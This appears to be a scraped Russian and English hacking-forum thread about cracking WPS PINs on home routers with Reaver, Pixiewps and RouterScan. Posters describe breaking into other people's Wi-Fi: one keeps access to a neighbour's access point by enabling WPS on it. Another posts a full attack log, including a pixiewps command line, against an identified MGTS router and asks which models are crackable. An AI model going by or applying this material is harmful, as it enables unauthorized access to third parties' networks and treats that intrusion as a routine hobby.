Moгy пoдeлитьcя cвoим oпытoм кacaтeльнo oбcyждeния Netis WF2411R c 225-й cтp.: былa вcкpытaя тoчкa. Чepeз нeк. вpeмя xoзяeвa пoмeняли мapшpyтизaтop нa Netis WF2419R. У нeгo (a мoжeт y вcex Netis'oв) пo yмoлчaнию WPS выключeн, нo пapoль ocтaвили пpeжний, блaгoдapя чeмy дocтyп coxpaнилcя. Я пoдyмaл чтo нeплoxo бы пoдcтpaxoвaтьcя нa cлyчaй cмeны пapoля и вкл. WPS. И тaк, вcё вpoдe былo xopoшo, пoкa вдpyг, чepeз пapy мecяцeв мнe нe зaxoтeлocь пpopeпeтиpoвaть пoлyчeниe нoвoгo пapoля. Я oчeнь yдивилcя, пoлyчив: . . . [*] Sending WPS Message M4... [*] Received WSC NACK. [-] Error: Wrong PIN code. вeдь pin был тoчнo пpaвильный, взятый из нacтpoeк мapшpyтизaтopa. Cтaлo яcнo чтo WPS пpocтo нepaбoчий. B итoгe я oбнoвил пpoшивкy и WPS зapaбoтaл. Дyмaю чтo y тoгo WF2411R тaжe фигня – кpивaя пpoшивкa, пoтoмy чтo y этoгo WF2419R нa кpивoй пpoшивкe тoжe E-Hash1 былo = E-Hash2, xoтя pin был нe пустoй и c paзными половинкaми.
На старых tenda был обыкновенный 24bit pin. Потом алгоритм заменили, но заменили на что? 24bit со сдвигом?
На 24-bit вообще совсем не похоже, слишком разница между пинами большая. Если есть желание, пореверси прошивки. Tenda Realtek Router, firmware: V12.01.01.36_multi Tenda Realtek Router, firmware: V12.01.01.28_multi
А почему бы тебе самому не попробовать ?.. Скачай роутерскан (он работает под виндовс , ну может не знаєшь ) он с пихивпс прекрасно работает и дефолтные пароли тебе скажет .
Нет, нельзя. Это zyxel keenetik, у них в прошивке исправлена уязвимость в криптографии, дающая возможность узнать pin. Так же ведут себя роутеры technicolor.
Hello for all please can any body help me to find the default pin for the router TL-WA701ND i used waircut but give me this error http://rgho.st/8ZChGZclG
TP-Link TL-Wx 7/8/9 series has no default pin generator (wps pin generation algorithm still not cracked). Atheros-based hardware invulnerable to pixiedust attack. NO chances to get wpa key via wps for this AP. Also, wa701nd is not a router, this is an AP. AP can't share internet, somewhere must be a root router.
thanks for this new information m.r (TOX1C USERX) what about the vtech router that i discussed before it has a wps but when perform pixiedust attack give me like this http://rgho.st/8vqYcWR62
Пробую мгтс роутер через pixiewps, но чет не выходит Reaver v1.6.5 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]> [+] Switching wlan1 to channel 1 [+] Restored previous session [+] Waiting for beacon from 78:94:B4:A7:F0:0B [+] Received beacon from 78:94:B4:A7:F0:0B [+] Vendor: Broadcom [+] Trying pin "29508860" [+] Sending authentication request [+] Sending association request [+] Associated with 78:94:B4:A7:F0:0B (ESSID: MGTS_GPON_1244) [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received M1 message [+] Sending M2 message [+] Received M1 message [+] Sending WSC NACK [+] Sending WSC NACK [!] WPS transaction failed (code: 0x03), re-trying last pin [+] Trying pin "29508860" [+] Sending authentication request [+] Sending association request [+] Associated with 78:94:B4:A7:F0:0B (ESSID: MGTS_GPON_1244) [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received deauth request [!] WARNING: Receive timeout occurred [+] Sending WSC NACK [!] WPS transaction failed (code: 0x02), re-trying last pin [+] Trying pin "29508860" [+] Sending authentication request [+] Sending association request [+] Associated with 78:94:B4:A7:F0:0B (ESSID: MGTS_GPON_1244) [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received deauth request [!] WARNING: Receive timeout occurred [+] Sending WSC NACK [!] WPS transaction failed (code: 0x02), re-trying last pin [+] Trying pin "29508860" [+] Sending authentication request [+] Sending association request [+] Associated with 78:94:B4:A7:F0:0B (ESSID: MGTS_GPON_1244) [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received deauth request [!] WARNING: Receive timeout occurred [+] Sending WSC NACK [!] WPS transaction failed (code: 0x02), re-trying last pin [+] Trying pin "29508860" [+] Sending authentication request [+] Sending association request [+] Associated with 78:94:B4:A7:F0:0B (ESSID: MGTS_GPON_1244) [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received M1 message [+] Sending M2 message executing pixiewps -e ca58311fd7670e3ab5df289152a60a9b4f08a7a764fe5fcd8db14916d32924a5c2974df235dbee8eb194e1e7d54153757d317feda2ccfd31adefa5c6138489ef3a74094a18f15305737f41f3fd868e716c20e4a52d24f0757d30a8cac5c4a02c7047600013112be7aed2f812c4b1068d7b205776d4ae704e138cb3888faf5e58b101ee03af137f9f180cc4c6ff309cd48759243de9ccde5af0cb8bdee164f61d72cff494eff921aef8c3c1e6853f60f1140bcb4c57866d2d5690c14d518d2b1c -s 213f72ab4b387fb072b81a23d53c784162e41e6a1784629ad98d5605759c7908 -z 4edd5d3887fa4afc11ae95efb9bd32eabb2a91af5100ee571037dabe4d49489e -a 9fc3f75289e25d4d358693e74ee2966fab3e1323e7f021dff51f40709c53f51b -n e82ffae4f879267d87fde5b2a84b9540 -r 46aba5645bc467b829c40d87d69c1436c3e460f989c4f51a4b8019c6243f1a94497c97afc94a2c6cda57020801f3d4f8faf5ef0252b99232616383337d12c5ee86e84d93a9017fc0a6eb140d601c7a016bd63e9ef664dc4be2cbee38f2c1096fdfa071c4673143f9909eebce20838ad79c2aa900af1bcaaca29e120a3c8c2b044e3e48506c0017bbf11c2293ffaabe15db2d8c710808a8a58b75c767480abbb835b2e448d23299eb7ba3a7d02737ce7c5e490d35a1797535a5155638e6e5e33b Pixiewps 1.4 [-] WPS pin not found! [*] Time taken: 7 s 833 ms Они не уязвимы или надо 1.2 версией пробовать ?
Да, но ведь в конечном итоге пакеты m1,m2,m3 получены для рассчета pixiewps утилиты. Или ты про то, что эти сами данные могут из-за плохого сигнала идти с ошибками и ривер это не показывает в логе ? С опцией force сразу выходит и также пишет, что не найден. Стоял ловил awus036nha + openwrt gl-ar300m с остановки. Было -77 сигнал при скане.
Нет, я про то, что при плохом сигнале трудно добиться, чтобы точка последовательно ответила на все пакеты до победного M7. Данные с ошибками не придут, проверки выполняются на уровне протокола 802.11. То, что точка неуязвима к pixie dust, это понятно сразу.
Да но это и не требовалось, если бы пин нашелся, я бы тогда поискал где место получше сигнала там. Читал этот пост https://forum.antichat.ru/threads/310835/page-170#post-3975181 А известно какие модели мгтсов ломаются пихиевпс, так как там пассы обычно сложные и если не ломается впс, то проще других наловить.